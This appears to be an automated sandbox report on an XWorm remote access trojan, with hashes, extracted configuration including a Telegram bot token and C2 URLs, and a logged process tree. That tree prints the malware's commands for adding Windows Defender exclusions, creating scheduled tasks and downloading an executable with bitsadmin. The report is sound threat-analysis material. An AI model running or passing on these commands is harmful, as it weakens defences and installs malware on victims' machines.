Overview

overview

10

Static

static

3

PhantomCrypter.exe

windows10-ltsc 2021-x64

10

Analysis

  • max time kernel
    85s
  • max time network
    87s
  • platform
    windows10-ltsc 2021_x64
  • resource
    win10ltsc2021-20250113-en
  • resource tags

    arch:x64arch:x86image:win10ltsc2021-20250113-enlocale:en-usos:windows10-ltsc 2021-x64system
  • submitted
    25-01-2025 10:45

Sharing

Copy URL
Twitter E-mail
Report Analysis Logs

General

  • Target

    PhantomCrypter.exe

  • Size

    5.0MB

  • MD5

    d4d28f2c6fd9af9ee5a3be30f9ab913b

  • SHA1

    be4264bceaff957ff799b73ebc2479f0fc794815

  • SHA256

    c69d8df82357c95fe43db40465d0169ea8e0feacd8a3e4debe87865544100d9e

  • SHA512

    7eed5b6d3420c930a07aee500e086ec61fd33099cd641a2efe7664081c0e5fdab4d1ad2b4835edcbe3e6722d44e60a75119a2900cfd00b7c182b20f379d7a977

  • SSDEEP

    98304:6l1z3/RZ58MoFyQbbpaR2p1AU6cBSdOWWzSPfEIeGLGIQaW5tqwZ0ch1+NXHKgv3:Y1z5Z58MQJe2PAU6cBSkWWzaETGDW/t

Score
10/10
xwormdiscoverydropperexecutionpersistencerattrojan

Malware Config

Extracted

Family

xworm

Version

5.0

Mutex

OnCH8EVI1tYADuXo

Attributes
  • Install_directory

    %LocalAppData%

  • install_file

    msedge.exe

  • pastebin_url

    https://pastebin.com/raw/RPPi3ByL

  • telegram

    https://api.telegram.org/bot7483240807:AAEYFrBoMgquxWoikOe9bVlqmoMC2b2AOO4/sendMessage?chat_id=5279018187

aes.plain
aes.plain
aes.plain

Signatures

  • Detect Xworm Payload 6 IoCs
  • Xworm

    Xworm is a remote access trojan written in C#.

    trojanratxworm
  • Xworm family
    xworm
  • Command and Scripting Interpreter: PowerShell 1 TTPs 12 IoCs

    Run Powershell to modify Windows Defender settings to add exclusions for file extensions, paths, and processes.

    execution
  • Download via BitsAdmin 1 TTPs 1 IoCs
    dropper
  • Checks computer location settings 2 TTPs 5 IoCs

    Looks up country code configured in the registry, likely geofence.

  • Drops startup file 6 IoCs
  • Executes dropped EXE 8 IoCs
  • Adds Run key to start application 2 TTPs 2 IoCs
    persistence
  • Legitimate hosting services abused for malware hosting/C2 1 TTPs 64 IoCs
  • Enumerates physical storage devices 1 TTPs

    Attempts to interact with connected storage/optical drive(s).

  • System Location Discovery: System Language Discovery 1 TTPs 3 IoCs

    Attempt gather information about the system language of a victim in order to infer the geographical location of that host.

    discovery
  • Modifies registry class 1 IoCs
  • Scheduled Task/Job: Scheduled Task 1 TTPs 3 IoCs

    Schtasks is often used by malware for persistence or to perform post-infection execution.

    persistenceexecution
  • Suspicious behavior: EnumeratesProcesses 36 IoCs
  • Suspicious use of AdjustPrivilegeToken 64 IoCs
  • Suspicious use of FindShellTrayWindow 1 IoCs
  • Suspicious use of WriteProcessMemory 45 IoCs
  • Uses Task Scheduler COM API 1 TTPs

    The Task Scheduler COM API can be used to schedule applications to run on boot or at set times.

    persistence

Processes

  • C:\Users\Admin\AppData\Local\Temp\PhantomCrypter.exe
    "C:\Users\Admin\AppData\Local\Temp\PhantomCrypter.exe"
    1⤵
    • Checks computer location settings
    • Modifies registry class
    • Suspicious use of WriteProcessMemory
    PID:3464
    • C:\Users\Admin\AppData\Roaming\Chrome Update.exe
      "C:\Users\Admin\AppData\Roaming\Chrome Update.exe"
      2⤵
      • Checks computer location settings
      • Drops startup file
      • Executes dropped EXE
      • Adds Run key to start application
      • Suspicious use of AdjustPrivilegeToken
      • Suspicious use of WriteProcessMemory
      PID:3748
      • C:\Windows\System32\WindowsPowerShell\v1.0\powershell.exe
        "C:\Windows\System32\WindowsPowerShell\v1.0\powershell.exe" -ExecutionPolicy Bypass Add-MpPreference -ExclusionPath 'C:\Users\Admin\AppData\Roaming\Chrome Update.exe'
        3⤵
        • Command and Scripting Interpreter: PowerShell
        • Suspicious behavior: EnumeratesProcesses
        • Suspicious use of AdjustPrivilegeToken
        PID:4188
      • C:\Windows\System32\WindowsPowerShell\v1.0\powershell.exe
        "C:\Windows\System32\WindowsPowerShell\v1.0\powershell.exe" -ExecutionPolicy Bypass Add-MpPreference -ExclusionProcess 'Chrome Update.exe'
        3⤵
        • Command and Scripting Interpreter: PowerShell
        • Suspicious behavior: EnumeratesProcesses
        PID:4576
      • C:\Windows\System32\WindowsPowerShell\v1.0\powershell.exe
        "C:\Windows\System32\WindowsPowerShell\v1.0\powershell.exe" -ExecutionPolicy Bypass Add-MpPreference -ExclusionPath 'C:\Users\Admin\AppData\Roaming\Chrome Update.exe'
        3⤵
        • Command and Scripting Interpreter: PowerShell
        • Suspicious behavior: EnumeratesProcesses
        PID:2768
      • C:\Windows\System32\WindowsPowerShell\v1.0\powershell.exe
        "C:\Windows\System32\WindowsPowerShell\v1.0\powershell.exe" -ExecutionPolicy Bypass Add-MpPreference -ExclusionProcess 'Chrome Update.exe'
        3⤵
        • Command and Scripting Interpreter: PowerShell
        • Suspicious behavior: EnumeratesProcesses
        PID:1116
      • C:\Windows\System32\schtasks.exe
        "C:\Windows\System32\schtasks.exe" /create /f /RL HIGHEST /sc minute /mo 1 /tn "Chrome Update" /tr "C:\Users\Admin\AppData\Roaming\Chrome Update.exe"
        3⤵
        • Scheduled Task/Job: Scheduled Task
        PID:4244
    • C:\Windows\SysWOW64\mshta.exe
      "C:\Windows\SysWOW64\mshta.exe" "C:\Users\Admin\AppData\Roaming\DownloaderLuc.hta" {1E460BD7-F1C3-4B2E-88BF-4E770A288AF5}{1E460BD7-F1C3-4B2E-88BF-4E770A288AF5}
      2⤵
      • Checks computer location settings
      • System Location Discovery: System Language Discovery
      • Suspicious use of WriteProcessMemory
      PID:1900
      • C:\Windows\SysWOW64\bitsadmin.exe
        "C:\Windows\System32\bitsadmin.exe" /transfer 8 https://spyderrock.com/xkdg5397-run.exe C:\Users\Admin\AppData\Local\Temp\Notify.exe
        3⤵
        • Download via BitsAdmin
        • System Location Discovery: System Language Discovery
        PID:1816
    • C:\Users\Admin\AppData\Roaming\msedge.exe
      "C:\Users\Admin\AppData\Roaming\msedge.exe"
      2⤵
      • Checks computer location settings
      • Drops startup file
      • Executes dropped EXE
      • Suspicious use of AdjustPrivilegeToken
      • Suspicious use of WriteProcessMemory
      PID:3220
      • C:\Windows\System32\WindowsPowerShell\v1.0\powershell.exe
        "C:\Windows\System32\WindowsPowerShell\v1.0\powershell.exe" -ExecutionPolicy Bypass Add-MpPreference -ExclusionPath 'C:\Users\Admin\AppData\Roaming\msedge.exe'
        3⤵
        • Command and Scripting Interpreter: PowerShell
        • Suspicious behavior: EnumeratesProcesses
        • Suspicious use of AdjustPrivilegeToken
        PID:4692
      • C:\Windows\System32\WindowsPowerShell\v1.0\powershell.exe
        "C:\Windows\System32\WindowsPowerShell\v1.0\powershell.exe" -ExecutionPolicy Bypass Add-MpPreference -ExclusionProcess 'msedge.exe'
        3⤵
        • Command and Scripting Interpreter: PowerShell
        • Suspicious behavior: EnumeratesProcesses
        PID:1060
      • C:\Windows\System32\WindowsPowerShell\v1.0\powershell.exe
        "C:\Windows\System32\WindowsPowerShell\v1.0\powershell.exe" -ExecutionPolicy Bypass Add-MpPreference -ExclusionPath 'C:\Users\Admin\AppData\Local\msedge.exe'
        3⤵
        • Command and Scripting Interpreter: PowerShell
        • Suspicious behavior: EnumeratesProcesses
        PID:3508
      • C:\Windows\System32\WindowsPowerShell\v1.0\powershell.exe
        "C:\Windows\System32\WindowsPowerShell\v1.0\powershell.exe" -ExecutionPolicy Bypass Add-MpPreference -ExclusionProcess 'msedge.exe'
        3⤵
        • Command and Scripting Interpreter: PowerShell
        • Suspicious behavior: EnumeratesProcesses
        PID:4268
      • C:\Windows\System32\schtasks.exe
        "C:\Windows\System32\schtasks.exe" /create /f /RL HIGHEST /sc minute /mo 1 /tn "msedge" /tr "C:\Users\Admin\AppData\Local\msedge.exe"
        3⤵
        • Scheduled Task/Job: Scheduled Task
        PID:2200
    • C:\Users\Admin\AppData\Roaming\OneDrive.exe
      "C:\Users\Admin\AppData\Roaming\OneDrive.exe"
      2⤵
      • Checks computer location settings
      • Drops startup file
      • Executes dropped EXE
      • Adds Run key to start application
      • Suspicious use of AdjustPrivilegeToken
      • Suspicious use of WriteProcessMemory
      PID:4656
      • C:\Windows\System32\WindowsPowerShell\v1.0\powershell.exe
        "C:\Windows\System32\WindowsPowerShell\v1.0\powershell.exe" -ExecutionPolicy Bypass Add-MpPreference -ExclusionPath 'C:\Users\Admin\AppData\Roaming\OneDrive.exe'
        3⤵
        • Command and Scripting Interpreter: PowerShell
        • Suspicious behavior: EnumeratesProcesses
        • Suspicious use of AdjustPrivilegeToken
        PID:3516
      • C:\Windows\System32\WindowsPowerShell\v1.0\powershell.exe
        "C:\Windows\System32\WindowsPowerShell\v1.0\powershell.exe" -ExecutionPolicy Bypass Add-MpPreference -ExclusionProcess 'OneDrive.exe'
        3⤵
        • Command and Scripting Interpreter: PowerShell
        • Suspicious behavior: EnumeratesProcesses
        PID:632
      • C:\Windows\System32\WindowsPowerShell\v1.0\powershell.exe
        "C:\Windows\System32\WindowsPowerShell\v1.0\powershell.exe" -ExecutionPolicy Bypass Add-MpPreference -ExclusionPath 'C:\ProgramData\OneDrive.exe'
        3⤵
        • Command and Scripting Interpreter: PowerShell
        • Suspicious behavior: EnumeratesProcesses
        PID:968
      • C:\Windows\System32\WindowsPowerShell\v1.0\powershell.exe
        "C:\Windows\System32\WindowsPowerShell\v1.0\powershell.exe" -ExecutionPolicy Bypass Add-MpPreference -ExclusionProcess 'OneDrive.exe'
        3⤵
        • Command and Scripting Interpreter: PowerShell
        • Suspicious behavior: EnumeratesProcesses
        PID:3948
      • C:\Windows\System32\schtasks.exe
        "C:\Windows\System32\schtasks.exe" /create /f /RL HIGHEST /sc minute /mo 1 /tn "OneDrive" /tr "C:\ProgramData\OneDrive.exe"
        3⤵
        • Scheduled Task/Job: Scheduled Task
        PID:2380
    • C:\Users\Admin\AppData\Roaming\TOPHERC.exe
      "C:\Users\Admin\AppData\Roaming\TOPHERC.exe"
      2⤵
      • Executes dropped EXE
      • System Location Discovery: System Language Discovery
      • Suspicious use of FindShellTrayWindow
      PID:3880
  • C:\ProgramData\OneDrive.exe
    "C:\ProgramData\OneDrive.exe"
    1⤵
    • Executes dropped EXE
    PID:1696
  • C:\Users\Admin\AppData\Local\msedge.exe
    "C:\Users\Admin\AppData\Local\msedge.exe"
    1⤵
    • Executes dropped EXE
    PID:4616
  • C:\ProgramData\OneDrive.exe
    "C:\ProgramData\OneDrive.exe"
    1⤵
    • Executes dropped EXE
    PID:1308
  • C:\Users\Admin\AppData\Local\msedge.exe
    "C:\Users\Admin\AppData\Local\msedge.exe"
    1⤵
    • Executes dropped EXE
    PID:2920

Network

MITRE ATT&CK Enterprise v15

Reconnaissance

Resource Development

Initial Access

Execution

Command and Scripting Interpreter

1
T1059

PowerShell

1
T1059.001

Scheduled Task/Job

1
T1053

Scheduled Task

1
T1053.005

Persistence

BITS Jobs

1
T1197

Boot or Logon Autostart Execution

1
T1547

Registry Run Keys / Startup Folder

1
T1547.001

Scheduled Task/Job

1
T1053

Scheduled Task

1
T1053.005

Privilege Escalation

Boot or Logon Autostart Execution

1
T1547

Registry Run Keys / Startup Folder

1
T1547.001

Scheduled Task/Job

1
T1053

Scheduled Task

1
T1053.005

Defense Evasion

BITS Jobs

1
T1197

Modify Registry

1
T1112

Credential Access

Discovery

Query Registry

2
T1012

System Information Discovery

2
T1082

System Location Discovery

1
T1614

System Language Discovery

1
T1614.001

Lateral Movement

Collection

Command and Control

Web Service

1
T1102

Exfiltration

Impact

Replay Monitor

Loading Replay Monitor...

Downloads

  • C:\Users\Admin\AppData\Local\Microsoft\CLR_v4.0\UsageLogs\OneDrive.exe.log
    Filesize

    654B

    MD5

    11c6e74f0561678d2cf7fc075a6cc00c

    SHA1

    535ee79ba978554abcb98c566235805e7ea18490

    SHA256

    d39a78fabca39532fcb85ce908781a75132e1bd01cc50a3b290dd87127837d63

    SHA512

    32c63d67bf512b42e7f57f71287b354200126cb417ef9d869c72e0b9388a7c2f5e3b61f303f1353baa1bf482d0f17e06e23c9f50b2f1babd4d958b6da19c40b0

    Download Submit

  • C:\Users\Admin\AppData\Local\Microsoft\CLR_v4.0\UsageLogs\powershell.exe.log
    Filesize

    3KB

    MD5

    3eb3833f769dd890afc295b977eab4b4

    SHA1

    e857649b037939602c72ad003e5d3698695f436f

    SHA256

    c485a6e2fd17c342fca60060f47d6a5655a65a412e35e001bb5bf88d96e6e485

    SHA512

    c24bbc8f278478d43756807b8c584d4e3fb2289db468bc92986a489f74a8da386a667a758360a397e77e018e363be8912ac260072fa3e31117ad0599ac749e72

    Download Submit

  • C:\Users\Admin\AppData\Local\Microsoft\Windows\PowerShell\StartupProfileData-NonInteractive
    Filesize

    1KB

    MD5

    f0f59cccd39a3694e0e6dfd44d0fa76d

    SHA1

    fccd7911d463041e1168431df8823e4c4ea387c1

    SHA256

    70466c7f3a911368d653396fdd68f993322c69e1797b492ca00f8be34b7f3401

    SHA512

    5c726e1e28cb9c0c3ab963fbfbf471c6033839f3e535a3811581fdaa4da17175e5a8a8be84a4fccd99b81e048058e51d230ff3836e3ec920057a1b1676110bee

    Download Submit

  • C:\Users\Admin\AppData\Local\Microsoft\Windows\PowerShell\StartupProfileData-NonInteractive
    Filesize

    1KB

    MD5

    60b3262c3163ee3d466199160b9ed07d

    SHA1

    994ece4ea4e61de0be2fdd580f87e3415f9e1ff6

    SHA256

    e3b30f16d41f94cba2b8a75f35c91ae7418465abfbfe5477ec0551d1952b2fdb

    SHA512

    081d2015cb94477eb0fbc38f44b6d9b4a3204fb3ad0b7d0e146a88ab4ab9a0d475207f1adae03f4a81ccc5beb7568dc8be1249f69e32fe56efd9ee2f6ee3b1af

    Download Submit

  • C:\Users\Admin\AppData\Local\Microsoft\Windows\PowerShell\StartupProfileData-NonInteractive
    Filesize

    1KB

    MD5

    217880b10b5c7db534e6ca11f04d3059

    SHA1

    a8ed869652e28617871b7a245185870e743e424b

    SHA256

    d5f871b09ecc1aa703a94e282cc786ca47c0020dc27f67a162854e6fa8a95793

    SHA512

    37f36749073eed66aa461d1ec57d45d6983f7623f12fb03abcc0ba4a08efe430d7a0632d93674f4671d7e3dce767927275dd56763a92eef5c40ddb02be2ccfc5

    Download Submit

  • C:\Users\Admin\AppData\Local\Microsoft\Windows\PowerShell\StartupProfileData-NonInteractive
    Filesize

    1KB

    MD5

    d9b023aba025ea7da423b289925e657b

    SHA1

    bbc92618b431ec1a52a0db3e42aafa91c056a208

    SHA256

    1a8c94830603da734d2c9e5178c30b639120937b79138cc5e49b6dbfa8ce4337

    SHA512

    24c2a91b77b216aff8afc2392fd647cb49567c0ac41c8f9610c9f94aeac8958490018f28bdc7174fcfd086862ab482ed4949c0e7f359239fdc18a13194feaf1d

    Download Submit

  • C:\Users\Admin\AppData\Local\Microsoft\Windows\PowerShell\StartupProfileData-NonInteractive
    Filesize

    1KB

    MD5

    4eb1592ecfd799f8b528ca4adbbaef3e

    SHA1

    669179cc8407d3d7e5e30a8707379a3056ffb445

    SHA256

    4d94fa0280fc0b680305be8ca83344177069577a0b06cbb63f009b898e3341bc

    SHA512

    a3b60512ba3bb0e2d7c55e5927d548e6316a48ae1e69ef0a819550e72f023ae8b1767c6f45781e3a91e0c3c1357bc3cf344fb41f28ca89ddd13ecfee972e003e

    Download Submit

  • C:\Users\Admin\AppData\Local\Microsoft\Windows\PowerShell\StartupProfileData-NonInteractive
    Filesize

    1KB

    MD5

    5dc0bf06113f867ab9be36428acea530

    SHA1

    bd73ca9bf3e5edc80370f4bc79eb403772440105

    SHA256

    d8e861ab4e7c40d5ccae45c056a72219decadc6061a0020cae2dfec8dc55e4ae

    SHA512

    e92b837a30d55b7d0f38aafc3a9403d77f2672b1de2113ba1926c7e84c89248813b50f942cbb72a166819f773b8ac4ba40d5a3329e1a815a2f833234b5a1d98d

    Download Submit

  • C:\Users\Admin\AppData\Local\Microsoft\Windows\PowerShell\StartupProfileData-NonInteractive
    Filesize

    1KB

    MD5

    c238412481a146ab11982ee82490777c

    SHA1

    61451087cbd22daf63c18b6c3c939fe0952f27c3

    SHA256

    25f1c3a4b36ae44eb159193c17cc953ae3fa576928f2384865ab837a964bd9f2

    SHA512

    4ee702b05336364af8cb89a6dd162b9404a8307c5fef96b7af82e8db55459b65b0ce1ce6f6e3018aa213a73f42ba5dc80d8550e45baf756ef0b8b8459e7f9f9b

    Download Submit

  • C:\Users\Admin\AppData\Local\Temp\__PSScriptPolicyTest_rhd3y4e0.wa1.ps1
    Filesize

    60B

    MD5

    d17fe0a3f47be24a6453e9ef58c94641

    SHA1

    6ab83620379fc69f80c0242105ddffd7d98d5d9d

    SHA256

    96ad1146eb96877eab5942ae0736b82d8b5e2039a80d3d6932665c1a4c87dcf7

    SHA512

    5b592e58f26c264604f98f6aa12860758ce606d1c63220736cf0c779e4e18e3cec8706930a16c38b20161754d1017d1657d35258e58ca22b18f5b232880dec82

    Download Submit

  • C:\Users\Admin\AppData\Roaming\Chrome Update.exe
    Filesize

    152KB

    MD5

    16cdd301591c6af35a03cd18caee2e59

    SHA1

    92c6575b57eac309c8664d4ac76d87f2906e8ef3

    SHA256

    11d55ac2f9070a70d12f760e9a6ee75136eca4bf711042acc25828ddda3582c8

    SHA512

    a44402e5e233cb983f7cfd9b81bc542a08d8092ffa4bd970fc25fe112355643506d5dfee0dd76f2e79b983df0fde67bfc50aabb477492a7596e38081e4083476

    Download Submit

  • C:\Users\Admin\AppData\Roaming\DownloaderLuc.hta
    Filesize

    844B

    MD5

    3f8a283abe6fe28a7d217c8105041426

    SHA1

    0283cd67e7cc0a99eeae3c3dea69716a6ac75bb1

    SHA256

    333c439c84ccbcab11dd9cc7f4d90596c5b65caf1164e8a908e61aa0222916b1

    SHA512

    bc5f8f256356c689953516877f8b7895fb1efe587feabdddf0e1524d0b22e3dcb89e0e654d19d0c314c6a376a0e7594965178a353d147ea98c43d3d5976f1846

    Download Submit

  • C:\Users\Admin\AppData\Roaming\OneDrive.exe
    Filesize

    140KB

    MD5

    a1cd6f4a3a37ed83515aa4752f98eb1d

    SHA1

    7f787c8d72787d8d130b4788b006b799167d1802

    SHA256

    5cbcc0a0c1d74cd54ac999717b0ff0607fe6ed02cca0a3e0433dd94783cfec65

    SHA512

    9489287e0b4925345fee05fe2f6e6f12440af1425ef397145e32e6f80c7ae98b530e42002d92dc156643f9829bc8a3b969e855cecd2265b6616c4514eed00355

    Download Submit

  • C:\Users\Admin\AppData\Roaming\TOPHERC.exe
    Filesize

    4.2MB

    MD5

    79f2fd33a188ff47216b4f4dd4552582

    SHA1

    16e40e0a1fed903fec20cd6cd600e3a2548881ad

    SHA256

    cc45d38fa00c5aeb33bdf842166460117b5e70b0b4fcf5bb6ef9747ec0b0575f

    SHA512

    caa33702fdc7e480a6093d2af035f860044a4e960fd6e5a4b91d6019f2c3d4c235d9e95734e6b54ea2a88af4e96bf72a54d81b2a70c1f64e76dcd202891905f2

    Download Submit

  • C:\Users\Admin\AppData\Roaming\msedge.exe
    Filesize

    166KB

    MD5

    aee20d80f94ae0885bb2cabadb78efc9

    SHA1

    1e82eba032fcb0b89e1fdf937a79133a5057d0a1

    SHA256

    498eb55b3fb4c4859ee763a721870bb60ecd57e99f66023b69d8a258efa3af7d

    SHA512

    3a05ff32b9aa79092578c09dfe67eaca23c6fe8383111dab05117f39d91f27670029f39482827d191bd6a652483202b8fc1813f8d5a0f3f73fd35ca37a4f6d42

    Download Submit

  • memory/3220-56-0x0000000000250000-0x000000000027E000-memory.dmp

    Filesize

    184KB

    Download

  • memory/3464-0-0x00007FFC1FDB3000-0x00007FFC1FDB5000-memory.dmp

    Filesize

    8KB

    Download

  • memory/3464-1-0x0000000000530000-0x0000000000A38000-memory.dmp

    Filesize

    5.0MB

    Download

  • memory/3748-47-0x00000000009A0000-0x00000000009CC000-memory.dmp

    Filesize

    176KB

    Download

  • memory/3748-57-0x00007FFC1FDB0000-0x00007FFC20872000-memory.dmp

    Filesize

    10.8MB

    Download

  • memory/3748-218-0x00007FFC1FDB0000-0x00007FFC20872000-memory.dmp

    Filesize

    10.8MB

    Download

  • memory/3880-73-0x00000000059D0000-0x00000000059DA000-memory.dmp

    Filesize

    40KB

    Download

  • memory/3880-72-0x0000000005AD0000-0x0000000005B6C000-memory.dmp

    Filesize

    624KB

    Download

  • memory/3880-71-0x0000000005A30000-0x0000000005AC2000-memory.dmp

    Filesize

    584KB

    Download

  • memory/3880-70-0x0000000005F40000-0x00000000064E6000-memory.dmp

    Filesize

    5.6MB

    Download

  • memory/3880-68-0x0000000000BB0000-0x0000000000FE8000-memory.dmp

    Filesize

    4.2MB

    Download

  • memory/4188-83-0x00000297491F0000-0x0000029749212000-memory.dmp

    Filesize

    136KB

    Download

  • memory/4656-58-0x0000000000040000-0x0000000000068000-memory.dmp

    Filesize

    160KB

    Download